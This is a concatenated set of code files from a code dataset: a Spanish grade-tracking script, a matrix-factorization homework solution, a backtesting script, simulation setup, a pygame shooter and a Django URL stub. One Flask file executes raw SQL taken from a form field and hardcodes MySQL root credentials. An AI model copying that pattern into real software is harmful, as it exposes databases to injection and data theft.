l1=listadoNiv3[cod]\r\n if notaCambio==\"1\":\r\n l1[0]=nuevaNota\r\n listadoNiv3[cod]=l1\r\n elif notaCambio==\"2\":\r\n l1[1]=nuevaNota\r\n listadoNiv3[cod]=l1\r\n elif notaCambio==\"3\":\r\n l1[2]=nuevaNota\r\n listadoNiv3[cod]=l1\r\n elif notaCambio==\"4\":\r\n l1[3]=nuevaNota\r\n listadoNiv3[cod]=l1\r\n print (listadoNiv3)\r\n elif opc==\"4\":\r\n l1=listadoNiv4[cod]\r\n if notaCambio==\"1\":\r\n l1[0]=nuevaNota\r\n listadoNiv4[cod]=l1\r\n elif notaCambio==\"2\":\r\n l1[1]=nuevaNota\r\n listadoNiv4[cod]=l1\r\n elif notaCambio==\"3\":\r\n l1[2]=nuevaNota\r\n listadoNiv4[cod]=l1\r\n elif notaCambio==\"4\":\r\n l1[3]=nuevaNota\r\n listadoNiv4[cod]=l1\r\n print (listadoNiv4)\r\n elif opc==\"5\":\r\n l1=listadoNiv5[cod]\r\n if notaCambio==\"1\":\r\n l1[0]=nuevaNota\r\n listadoNiv5[cod]=l1\r\n elif notaCambio==\"2\":\r\n l1[1]=nuevaNota\r\n listadoNiv5[cod]=l1\r\n elif notaCambio==\"3\":\r\n l1[2]=nuevaNota\r\n listadoNiv5[cod]=l1\r\n elif notaCambio==\"4\":\r\n l1[3]=nuevaNota\r\n listadoNiv5[cod]=l1\r\n print (listadoNiv5)\r\n def definitivaNivel(self, listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5,cod):\r\n n1=[]\r\n n2=[]\r\n n3=[]\r\n n4=[]\r\n n5=[]\r\n n1=listadoNiv1[cod]\r\n n2=listadoNiv2[cod]\r\n n3=listadoNiv3[cod]\r\n n4=listadoNiv4[cod]\r\n n5=listadoNiv5[cod]\r\n \r\n suma1=0.0\r\n for c in range (0,4):\r\n suma1 = n1[c]+ suma1\r\n print (\"Definitiva del nivel 1: \")\r\n print (suma1/4)\r\n suma2=0.0\r\n for c in range (0,4):\r\n suma2 = n2[c]+ suma2\r\n print (\"Definitiva del nivel 2: \")\r\n print (suma2/4)\r\n suma3=0.0\r\n for c in range (0,4):\r\n suma3 = n3[c]+ suma3\r\n print (\"Definitiva del nivel 3: \")\r\n print (suma3/4)\r\n suma4=0.0\r\n for c in range (0,4):\r\n suma4 = n4[c]+ suma4\r\n print (\"Definitiva del nivel 4: \")\r\n print (suma4/4)\r\n suma5=0.0\r\n for c in range (0,4):\r\n suma5 = n5[c]+ suma5\r\n print (\"Definitiva del nivel 5: \")\r\n print (suma5/4)\r\n \r\n sumaTotal=((suma1/4)+(suma2/4)+(suma3/4)+(suma4/4)+(suma5/4))/5\r\n return sumaTotal\r\n def promedio(self, listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5,cod):\r\n n1=[]\r\n n2=[]\r\n n3=[]\r\n n4=[]\r\n n5=[]\r\n n1=listadoNiv1[cod]\r\n n2=listadoNiv2[cod]\r\n n3=listadoNiv3[cod]\r\n n4=listadoNiv4[cod]\r\n n5=listadoNiv5[cod]\r\n \r\n ptaller = (n1[0]+n2[0]+n3[0]+n4[0]+n5[0])/5\r\n pquiz1= (n1[1]+n2[1]+n3[1]+n4[1]+n5[1])/5\r\n pquiz2= (n1[2]+n2[2]+n3[2]+n4[2]+n5[2])/5\r\n pexamen= (n1[3]+n2[3]+n3[3]+n4[3]+n5[3])/5\r\n \r\n pquiz=(pquiz1+pquiz2)/2\r\n \r\n print(\"El promedio de los talleres es: \")\r\n print(ptaller)\r\n print(\"El promedio de los quices es: \")\r\n print(pquiz)\r\n print(\"El promedio de los examenes es: \")\r\n print(pexamen)\r\n \r\n def consulta(self, listadoAlumno, cod):\r\n estud=[]\r\n estud=listadoAlumno[cod]\r\n print (\"Nombre: \"+ estud[0])\r\n print (\"Apellido: \"+ estud[1])\r\n print (\"Edad: \"+ str(estud[2]))\r\n print (\"Codigo: \"+ estud[3])\r\n print (\"Cedula: \"+ estud[4])\r\n print (\"Semestre: \"+ estud[5])\r\n print (\"Carrera: \"+ estud[6])\r\n print (\"Celular: \"+ estud[7])\r\n \r\nlistadoAlumno={} \r\nlistadoNiv1={} \r\nlistadoNiv2={} \r\nlistadoNiv3={} \r\nlistadoNiv4={} \r\nlistadoNiv5={} \r\nlistaCod=[]\r\ns=\"si\" \r\nwhile s==\"si\": \r\n nombre=input(\"Ingrese el nombre: \") \r\n apellido=input(\"Ingrese el apellido: \") \r\n edad=int(input(\"Ingrese la edad: \")) \r\n codigo=input(\"Ingrese el codigo: \") \r\n cedula=input(\"Ingrese la cedula: \") \r\n semestre=input(\"Ingrese el semestre: \") \r\n carrera=input(\"Ingrese la carrera: \") \r\n direccion=input(\"Ingrese la direccion: \") \r\n celular=input(\"Ingrese el celular: \") \r\n alumno=Estudiante(nombre, apellido, edad, codigo,semestre, cedula, carrera, direccion, celular)\r\n listaCod.append(codigo)\r\n\r\n listadoAlumno=alumno.listaAlumno(listadoAlumno)\r\n print(\"----Nivel 1----\")\r\n t=float(input(\"Taller: \"))\r\n q1=float(input(\"Quiz 1: \"))\r\n q2=float(input(\"Quiz 2: \"))\r\n ex=float(input(\"Examen: \"))\r\n nivNotas=Nivel(t,q1,q2,ex)\r\n\r\n listadoNiv1=nivNotas.listaNiv(listadoNiv1, codigo)\r\n print(\"----Nivel 2----\")\r\n t=float(input(\"Taller: \"))\r\n q1=float(input(\"Quiz 1: \"))\r\n q2=float(input(\"Quiz 2: \"))\r\n ex=float(input(\"Examen: \"))\r\n nivNotas=Nivel(t,q1,q2,ex)\r\n\r\n listadoNiv2=nivNotas.listaNiv(listadoNiv2, codigo)\r\n print(\"----Nivel 3----\")\r\n t=float(input(\"Taller: \"))\r\n q1=float(input(\"Quiz 1: \"))\r\n q2=float(input(\"Quiz 2: \"))\r\n ex=float(input(\"Examen: \"))\r\n nivNotas=Nivel(t,q1,q2,ex)\r\n\r\n listadoNiv3=nivNotas.listaNiv(listadoNiv3, codigo)\r\n print(\"----Nivel 4----\")\r\n t=float(input(\"Taller: \"))\r\n q1=float(input(\"Quiz 1: \"))\r\n q2=float(input(\"Quiz 2: \"))\r\n ex=float(input(\"Examen: \"))\r\n nivNotas=Nivel(t,q1,q2,ex)\r\n\r\n listadoNiv4=nivNotas.listaNiv(listadoNiv4, codigo)\r\n print(\"----Nivel 5----\")\r\n t=float(input(\"Taller: \"))\r\n q1=float(input(\"Quiz 1: \"))\r\n q2=float(input(\"Quiz 2: \"))\r\n ex=float(input(\"Examen: \"))\r\n nivNotas=Nivel(t,q1,q2,ex)\r\n\r\n listadoNiv5=nivNotas.listaNiv(listadoNiv5, codigo)\r\n\r\n s=input(\"┐Agregar otro estudiate? si/no: \")\r\nprint(\"----------Menu----------\") \r\nprint(\"1. Visualizar informacion de los niveles. \") \r\nprint(\"2. Cambiar las notas de un nivel.\") \r\nprint(\"3. Calcular la nota definitiva de todos los niveles.\")\r\nprint(\"4. Calcular la nota definitiva del curso.\") \r\nprint(\"5. Calcular la nota promedio para talleres, quieces y examenes.\") \r\nprint(\"6. Ver informacion de un estudiante.\") \r\nopc=input()\r\nif opc==\"1\":\r\n nivNotas.visualizar(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5)\r\nelif opc==\"2\": \r\n hacer=0 \r\n while(hacer==0): \r\n busqueda=input(\"Ingrese cod del estudiante al que desea cambiar notas: \") \r\n if busqueda in listaCod:\r\n hacer=2\r\n nivNotas.cambiar(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5, busqueda)\r\n else:\r\n print(\"No se encuentra este cod. Intntelo de nuevo\")\r\n hacer=0\r\nelif opc==\"3\":\r\n hacer=0\r\n \r\n while(hacer==0): \r\n busqueda=input(\"Ingrese cod del estudiante al que desea consultar la definitiva por nivel: \") \r\n if busqueda in listaCod:\r\n hacer=2\r\n nivNotas.definitivaNivel(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5, busqueda)\r\n else:\r\n print(\"No se encuentra este cod. Intntelo de nuevo\")\r\n hacer=0\r\nelif opc==\"4\":\r\n hacer=0\r\n \r\n while(hacer==0): \r\n busqueda=input(\"Ingrese cod del estudiante al que desea calcular definitiva del curso: \") \r\n if busqueda in listaCod:\r\n hacer=2\r\n sumaTotal=nivNotas.definitivaNivel(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5, busqueda)\r\n print(\"La definitiva de todo el curso es:\")\r\n print(sumaTotal)\r\n else:\r\n print(\"No se encuentra este cod. Intntelo de nuevo\")\r\n hacer=0\r\nelif opc==\"5\":\r\n hacer=0\r\n \r\n while(hacer==0): \r\n busqueda=input(\"Ingrese cod del estudiante al que desea calcular promedio de talleres, quices y examenes: \") \r\n if busqueda in listaCod:\r\n hacer=2\r\n nivNotas.promedio(listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5, busqueda)\r\n \r\n else:\r\n print(\"No se encuentra este cod. Intntelo de nuevo\")\r\n hacer=0\r\nelif opc==\"6\":\r\n hacer=0\r\n \r\n while(hacer==0): \r\n busqueda=input(\"Ingrese cod del estudiante que desea consultar: \") \r\n if busqueda in listaCod:\r\n hacer=2\r\n nivNotas.consulta(listadoAlumno, busqueda)\r\n \r\n else:\r\n print(\"No se encuentra este cod. Intntelo de nuevo\")\r\n hacer=0","sub_path":"tallercodigosegundaparte.py","file_name":"tallercodigosegundaparte.py","file_ext":"py","file_size_in_byte":11675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"140699794","text":"# Solution set for CS 155 Set 6, 2016/2017\n# Authors: Fabian Boemer, Sid Murching, Suraj Nair\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom basicutils import train_model, get_err\nfrom basicvis import visualize, interesting_vis\nfrom collections import Counter\n\ndef main():\n Y_train = np.loadtxt('data/train.txt').astype(int)\n Y_test = np.loadtxt('data/test.txt').astype(int)\n\n M = max(max(Y_train[:,0]), max(Y_test[:,0])).astype(int) # users\n N = max(max(Y_train[:,1]), max(Y_test[:,1])).astype(int) # movies\n print(\"Factorizing with M: \", M, \" users, N: \", N, \" movies.\")\n K = 20\n\n reg = 0.1\n eta = 0.03 # learning rate\n E_in = []\n E_out = []\n\n # Use to compute Ein and Eout\n U, V, E_in = train_model(M, N, K, eta, reg, Y_train)\n E_out = get_err(U, V, Y_test)\n print('E_out (MSE): ', E_out)\n\n # Apply SVD to V\n A, s, B = np.linalg.svd(V)\n # Use first 2 columns of A\n A2 = A[:, :2]\n U_projected = np.dot(A2.T, U.T)\n V_projected = np.dot(A2.T, V).T\n X = V_projected[:, 0]\n Y = V_projected[:, 1]\n\n visualize(X, Y, '5-1')\n interesting_vis(X, Y, '5-1')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"5-1.py","file_name":"5-1.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85091487","text":"from flask import Flask, render_template, jsonify, redirect, send_from_directory, request, url_for\nimport pymysql \n\nconn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='root', db='afterclasscalendar', charset='utf8')\napp = Flask(__name__)\ncursor = conn.cursor()\ncursor.execute(\"select * from 社團\")\n# 獲取第一行資料\n# row_1 = cursor.fetchone()\nrow_n = cursor.fetchmany(169)\nahhggh = 'row_1'\nstructhhh = str(row_n) + \"\\n\"\n# print(structhhh)\norder = \"select * from 社團\"\n@app.route('/',methods=['GET','POST'])\ndef hello():\n if(request.method == 'POST'):\n order = request.form.get('select')\n cursor.execute(order)\n row_1 = cursor.fetchone()\n strsql = str(row_1)\n print(order)\n return render_template('abc.html') + strsql\n return render_template('abc.html')\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n cursor.execute(order)\n # 獲取第一行資料\n # row_1 = cursor.fetchone()\n row_n = cursor.fetcone()\n ahhggh = 'row_1'\n structhhh = str(row_n) \n return structhhh\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(debug=False, host='140.134.79.128', port='40128')\n","sub_path":"python_保險.py","file_name":"python_保險.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96150818","text":"from backtesting import Backtest, Strategy\nfrom backtesting.lib import crossover\nimport talib as ta\nfrom backtesting.test import SMA, EURUSD\n\nimport pandas as pd\n\nfrom datetime import datetime\nfrom datetime import timedelta\nimport random\nimport datetime\n\ndf = pd.read_csv('data/USDJPY1h.csv')\ndf = df.set_index(pd.to_datetime(df['Date'].apply(str) + ' ' + df['Timestamp']))\ndf = df[:1000]\n\n# df preprocessing\ndel df['Date']\ndel df['Timestamp']\ndf.columns = ['Open', 'High', 'Low', 'Close', 'Volume']\nopen = df[\"Open\"].values\nhigh = df[\"High\"].values\nlow = df[\"Low\"].values\nclose = df[\"Close\"].values\n\n\nclass SmaCross(Strategy):\n def init(self):\n Close = self.data.Close\n self.ma1 = self.I(SMA, Close, 10)\n self.ma2 = self.I(SMA, Close, 20)\n\n # example of using talib data\n self.sma = self.I(ta.SMA, self.data.Close, 20)\n self.atr = self.I(ta.ATR, self.data.High, self.data.Low, self.data.Close, 20)\n\n self.high20 = self.I(ta.MAX, self.data.High, 20)\n self.low20 = self.I(ta.MIN, self.data.Low, 20)\n\n self.sell_sl = self.data.Low + self.atr * 2\n self.buy_sl = self.data.High - self.atr * 2\n\n def next(self):\n pass\n # if crossover(self.ma1, self.ma2):\n # self.buy()\n # elif crossover(self.ma2, self.ma1):\n # self.sell()\n\n\n\n\n\nbt = Backtest(df, SmaCross,\n cash=10000, commission=.002, margin=0.01)\nbt.run()\nbt.plot()\n","sub_path":"back_test.py","file_name":"back_test.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"557626409","text":"from subprocess import call\nimport os, sys\nimport numpy as np\n\nRMAX=0.0100\nRMIN=0.0100 \nN=10000\nfor S in [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8] :\n LAMBDA=(1+S)/(1-S)\n for ETA in [0.25, 0.50, 0.75, 1.00] :\n BNAME=\"LAMBDA_{0:03.2f}-ETA_{1:03.2f}\".format(LAMBDA, ETA)\n GRANULO_FILE=\"INPUT\\/granulo-\"+BNAME+\".txt\"\n DIRNAME=BNAME\n print(\"Generating simul directory -> {}\".format(DIRNAME))\n call(\"cp -a base-simul/ {}\".format(DIRNAME), shell=True)\n call(\"sed -i.bck 's/REPLACE_RMAX/{0}/' {1}/INPUT/prepro_conf.yaml\".format(RMAX, DIRNAME), shell=True)\n call(\"sed -i.bck 's/REPLACE_RMIN/{0}/' {1}/INPUT/prepro_conf.yaml\".format(RMIN, DIRNAME), shell=True)\n print(\"Replace GRANULOMETRY_FILE with value -> {}\".format(GRANULO_FILE))\n call(\"sed -i.bck 's/REPLACE_GRANULOMETRY_FILE/{0}/' {1}/INPUT/prepro_conf.yaml\".format(GRANULO_FILE, DIRNAME), shell=True)\n FACTOR=3.5*LAMBDA\n NX = NY = int((N/FACTOR)**(1.0/3.0) + 1)\n NZ = int(FACTOR*NX + 1)\n call(\"sed -i.bck 's/REPLACE_NX/{0:d}/' {1}/INPUT/prepro_conf.yaml\".format(NX, DIRNAME), shell=True)\n call(\"sed -i.bck 's/REPLACE_NY/{0:d}/' {1}/INPUT/prepro_conf.yaml\".format(NY, DIRNAME), shell=True)\n call(\"sed -i.bck 's/REPLACE_NZ/{0:d}/' {1}/INPUT/prepro_conf.yaml\".format(NZ, DIRNAME), shell=True)\n\n NNEIGHMAX=max(18, int((LAMBDA+2)*10))\n if LAMBDA > 4.0:\n NNEIGHMAX=200\n print(\"Setting NNEIGHMAX to : {0}\".format(NNEIGHMAX))\n call(\"sed -i.bck 's/NNEIGHREPLACEME/{0}/' {1}/INPUT/general_conf.yaml\".format(NNEIGHMAX, DIRNAME), shell=True)\n\nprint(\"Done.\")\n","sub_path":"dem-simuls/2018-04-29-iso-better_granulometry/generate_granulo_iso_simuls.py","file_name":"generate_granulo_iso_simuls.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"261430164","text":"# Shmup - Part 21\n# organize code - move to game object and separate methods for new, draw, update, etc\n# see \"pg template(advanced).py\" for details\n# by KidsCanCode 2015\n# A space shmup in multiple parts\n# For educational purposes only\n# Art from Kenney.nl\n# Frozen Jam by tgfcoder licensed under CC-BY-3\n\nimport pygame as pg\nimport random\nimport sys\nfrom os import path\n\nsound_dir = path.join(path.dirname(__file__), 'snd')\nimg_dir = path.join(path.dirname(__file__), 'img')\n\n# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\n\n# game settings\nWIDTH = 480\nHEIGHT = 600\nFPS = 60\nTITLE = \"SHMUP\"\nBGCOLOR = BLACK\nPOWERUP_TIME = 5000\n\ndef draw_text(surf, text, size, x, y):\n # generic function to draw some text\n font_name = pg.font.match_font('arial')\n font = pg.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x, y)\n surf.blit(text_surface, text_rect)\n\ndef draw_shield_bar(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 10\n fill = (pct / 100) * BAR_LENGTH\n outline_rect = pg.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pg.Rect(x, y, fill, BAR_HEIGHT)\n pg.draw.rect(surf, GREEN, fill_rect)\n pg.draw.rect(surf, WHITE, outline_rect, 2)\n\ndef draw_lives(surf, img, x, y, lives):\n for i in range(lives):\n img_rect = img.get_rect()\n img_rect.x = x + 30 * i\n img_rect.y = y\n surf.blit(img, img_rect)\n\n############ DEFINE SPRITES ############\nclass Player(pg.sprite.Sprite):\n # player sprite - moves left/right, shoots\n def __init__(self, game, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.game = game\n self.image = pg.transform.scale(game.player_image, (50, 38))\n self.rect = self.image.get_rect()\n self.radius = 22\n # uncomment to test the radius\n # pg.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 10\n self.speedx = 0\n self.shield = 100\n self.shoot_delay = 250\n self.last_shot = pg.time.get_ticks()\n self.power = 1\n self.power_time = pg.time.get_ticks()\n self.lives = 3\n self.hidden = False\n self.hide_timer = pg.time.get_ticks()\n\n def hide(self):\n # hide player temporarily\n self.hidden = True\n self.hide_timer = pg.time.get_ticks()\n self.loc = self.rect.center\n self.rect.center = (WIDTH / 2, HEIGHT + 200)\n\n def update(self):\n # unhide if hidden\n if self.hidden and pg.time.get_ticks() - self.hide_timer > 1000:\n self.hidden = False\n self.rect.center = self.loc\n # timeout for powerups\n if self.power >= 2 and pg.time.get_ticks() - self.power_time > POWERUP_TIME:\n self.power -= 1\n self.power_time = pg.time.get_ticks()\n # only move if arrow key is pressed\n self.speedx = 0\n keystate = pg.key.get_pressed()\n if keystate[pg.K_LEFT]:\n self.speedx = -5\n if keystate[pg.K_RIGHT]:\n self.speedx = 5\n if keystate[pg.K_SPACE]:\n self.shoot()\n\n # move the sprite\n self.rect.x += self.speedx\n # stop at the edges\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n def powerup(self):\n self.game.power_sound.play()\n self.power += 1\n self.power_time = pg.time.get_ticks()\n\n def shoot(self):\n now = pg.time.get_ticks()\n if not self.hidden and now - self.last_shot > self.shoot_delay:\n self.last_shot = now\n if self.power == 1:\n self.shoot_delay = 250\n Bullet(self.game.bullet_image, self.rect.centerx, self.rect.top,\n [self.game.all_sprites, self.game.bullets])\n self.game.pew_sound.play()\n if self.power == 2:\n self.shoot_delay = 250\n Bullet(self.game.bullet_image, self.rect.left, self.rect.centery,\n [self.game.all_sprites, self.game.bullets])\n Bullet(self.game.bullet_image, self.rect.right, self.rect.centery,\n [self.game.all_sprites, self.game.bullets])\n self.game.pew_sound.play()\n if self.power >= 3:\n self.shoot_delay = 150\n Bullet(self.game.bullet_image, self.rect.left, self.rect.centery,\n [self.game.all_sprites, self.game.bullets])\n Bullet(self.game.bullet_image, self.rect.right, self.rect.centery,\n [self.game.all_sprites, self.game.bullets])\n Bullet(self.game.bullet_image, self.rect.centerx, self.rect.top,\n [self.game.all_sprites, self.game.bullets])\n self.game.pew_sound.play()\n\nclass Mob(pg.sprite.Sprite):\n # mob sprite - spawns above top and moves downward\n def __init__(self, images, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.image0 = random.choice(images)\n self.image0.set_colorkey(BLACK)\n self.image = self.image0.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.85 / 2)\n # uncomment to test the radius\n # pg.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-80, -50)\n self.speedx = random.randrange(-3, 3)\n self.speedy = random.randrange(1, 8)\n self.rot = 0\n self.rot_speed = random.randrange(-10, 10)\n self.last_update = pg.time.get_ticks()\n\n def rotate(self):\n now = pg.time.get_ticks()\n if now - self.last_update > 50:\n self.last_update = now\n self.rot = (self.rot + self.rot_speed) % 360\n new_image = pg.transform.rotate(self.image0, self.rot)\n old_center = self.rect.center\n self.image = new_image\n self.rect = self.image.get_rect()\n self.rect.center = old_center\n\n def update(self):\n self.rotate()\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > HEIGHT or self.rect.right < 0 or self.rect.left > WIDTH:\n self.rect.y = random.randrange(-80, -50)\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.speedy = random.randrange(1, 8)\n\nclass Bullet(pg.sprite.Sprite):\n def __init__(self, img, x, y, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.image = img\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedy = -10\n\n def update(self):\n self.rect.y += self.speedy\n # kill if off top of screen\n if self.rect.bottom < 0:\n self.kill()\n\nclass Powerup(pg.sprite.Sprite):\n def __init__(self, images, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.type = random.choice(['shield', 'gun'])\n self.image = images[self.type]\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = -20\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.speedy = 3\n\n def update(self):\n self.rect.y += self.speedy\n # kill if off bottom of screen\n if self.rect.top > HEIGHT:\n self.kill()\n\nclass Explosion(pg.sprite.Sprite):\n def __init__(self, anim, center, size, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.anim = anim\n self.size = size\n self.image = anim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pg.time.get_ticks()\n self.frame_rate = 75\n\n def update(self):\n now = pg.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame += 1\n if self.frame == len(self.anim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = self.anim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n# initialize pg\npg.init()\npg.mixer.init()\n\n\nclass Game:\n # The Game object will initialize the game, run the game loop,\n # and display start/end screens\n\n def __init__(self):\n # initialize the game and create the window\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n pg.display.set_caption(TITLE)\n # start the clock\n self.clock = pg.time.Clock()\n self.load_data()\n\n def new(self):\n # initialize all your variables and do all the setup for a new game\n self.all_sprites = pg.sprite.Group()\n self.mobs = pg.sprite.Group()\n self.bullets = pg.sprite.Group()\n self.powerups = pg.sprite.Group()\n\n self.player = Player(self, [self.all_sprites])\n for i in range(15):\n Mob(self.meteor_images, [self.all_sprites, self.mobs])\n self.score = 0\n self.last_powerup = pg.time.get_ticks()\n pg.mixer.music.play(loops=-1)\n\n def load_data(self):\n # load all your assets (sounds, images, etc.)\n self.pew_sound = pg.mixer.Sound(path.join(sound_dir, 'pew.wav'))\n self.shield_sound = pg.mixer.Sound(path.join(sound_dir, 'pow4.wav'))\n self.power_sound = pg.mixer.Sound(path.join(sound_dir, 'pow5.wav'))\n self.player_die_sound = pg.mixer.Sound(path.join(sound_dir, 'rumble1.ogg'))\n self.expl_sounds = []\n for snd in ['expl3.wav', 'expl6.wav']:\n self.expl_sounds.append(pg.mixer.Sound(path.join(sound_dir, snd)))\n pg.mixer.music.load(path.join(sound_dir, 'tgfcoder-FrozenJam-SeamlessLoop.ogg'))\n pg.mixer.music.set_volume(0.4)\n self.background = pg.image.load(path.join(img_dir, 'starfield.png')).convert()\n self.background_rect = self.background.get_rect()\n self.player_image = pg.image.load(path.join(img_dir, 'playerShip1_orange.png')).convert()\n self.player_image.set_colorkey(BLACK)\n self.player_mini_image = pg.transform.scale(self.player_image, (25, 19))\n self.bullet_image = pg.image.load(path.join(img_dir, 'laserRed16.png')).convert()\n meteor_list = ['meteorBrown_med3.png', 'meteorBrown_med1.png',\n 'meteorBrown_small2.png', 'meteorBrown_tiny1.png']\n self.meteor_images = []\n for img in meteor_list:\n self.meteor_images.append(pg.image.load(path.join(img_dir, img)).convert())\n self.powerup_images = {}\n self.powerup_images['shield'] = pg.image.load(path.join(img_dir, 'shield_gold.png')).convert()\n self.powerup_images['gun'] = pg.image.load(path.join(img_dir, 'bolt_gold.png')).convert()\n self.explosion_anim = {}\n self.explosion_anim['lg'] = []\n self.explosion_anim['sm'] = []\n self.explosion_anim['player'] = []\n for i in range(9):\n img = pg.image.load(path.join(img_dir, 'regularExplosion0{}.png'.format(i))).convert()\n img.set_colorkey(BLACK)\n img1 = pg.transform.scale(img, (75, 75))\n self.explosion_anim['lg'].append(img1)\n img2 = pg.transform.scale(img, (32, 32))\n self.explosion_anim['sm'].append(img2)\n img = pg.image.load(path.join(img_dir, 'sonicExplosion0{}.png'.format(i))).convert()\n img.set_colorkey(BLACK)\n self.explosion_anim['player'].append(img)\n\n def run(self):\n # The Game loop - set self.running to False to end the game\n self.running = True\n while self.running:\n self.clock.tick(FPS)\n self.events()\n self.update()\n self.draw()\n\n def quit(self):\n pg.quit()\n sys.exit()\n\n def update(self):\n # the update part of the game loop\n self.all_sprites.update()\n\n # check if bullets hit mobs\n hits = pg.sprite.groupcollide(self.mobs, self.bullets, True, True)\n for hit in hits:\n # more points for smaller hits\n self.score += 25 - hit.radius\n Explosion(self.explosion_anim, hit.rect.center, 'lg', [self.all_sprites])\n random.choice(self.expl_sounds).play()\n Mob(self.meteor_images, [self.all_sprites, self.mobs])\n\n # check if mobs hit player\n hits = pg.sprite.spritecollide(self.player, self.mobs, True, pg.sprite.collide_circle)\n for hit in hits:\n self.player.shield -= hit.radius * 2\n Explosion(self.explosion_anim, hit.rect.center, 'sm', [self.all_sprites])\n Mob(self.meteor_images, [self.all_sprites, self.mobs])\n\n if self.player.shield <= 0:\n # spawn a player explosion and delete the player sprite\n self.player_die_sound.play()\n self.death_explosion = Explosion(self.explosion_anim, self.player.rect.center, 'player', [self.all_sprites])\n self.player.hide()\n self.player.lives -= 1\n self.player.shield = 100\n self.player.power = 1\n # if player died and explosion finished\n if self.player.lives == 0 and not self.death_explosion.alive():\n self.running = False\n pg.mixer.music.stop()\n\n # check if player hits powerup\n hits = pg.sprite.spritecollide(self.player, self.powerups, True)\n for hit in hits:\n if hit.type == 'shield':\n self.player.shield += 20\n self.shield_sound.play()\n if self.player.shield > 100:\n self.player.shield = 100\n if hit.type == 'gun':\n self.player.powerup()\n\n # spawn a powerup (maybe)\n now = pg.time.get_ticks()\n if now - self.last_powerup > 3000 and random.random() > 0.99:\n self.last_powerup = now\n Powerup(self.powerup_images, [self.all_sprites, self.powerups])\n\n def draw(self):\n # draw everything to the screen\n self.screen.fill(BGCOLOR)\n self.screen.blit(self.background, self.background_rect)\n self.all_sprites.draw(self.screen)\n score_text = str(self.score)\n draw_text(self.screen, score_text, 18, WIDTH / 2, 10)\n draw_shield_bar(self.screen, 5, 5, self.player.shield)\n draw_lives(self.screen, self.player_mini_image, WIDTH - 100, 5, self.player.lives)\n pg.display.flip()\n\n def events(self):\n # catch all events here\n for event in pg.event.get():\n # this one checks for the window being closed\n if event.type == pg.QUIT:\n self.quit()\n\n def show_start_screen(self):\n # show the start screen\n pass\n\n def show_go_screen(self):\n # show the game over screen\n pass\n\n# create the game object\ng = Game()\nwhile True:\n g.show_start_screen()\n g.new()\n g.run()\n g.show_go_screen()\n","sub_path":"shmup/shmup-21.py","file_name":"shmup-21.py","file_ext":"py","file_size_in_byte":15425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"277383851","text":"\"\"\"crudexample URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n 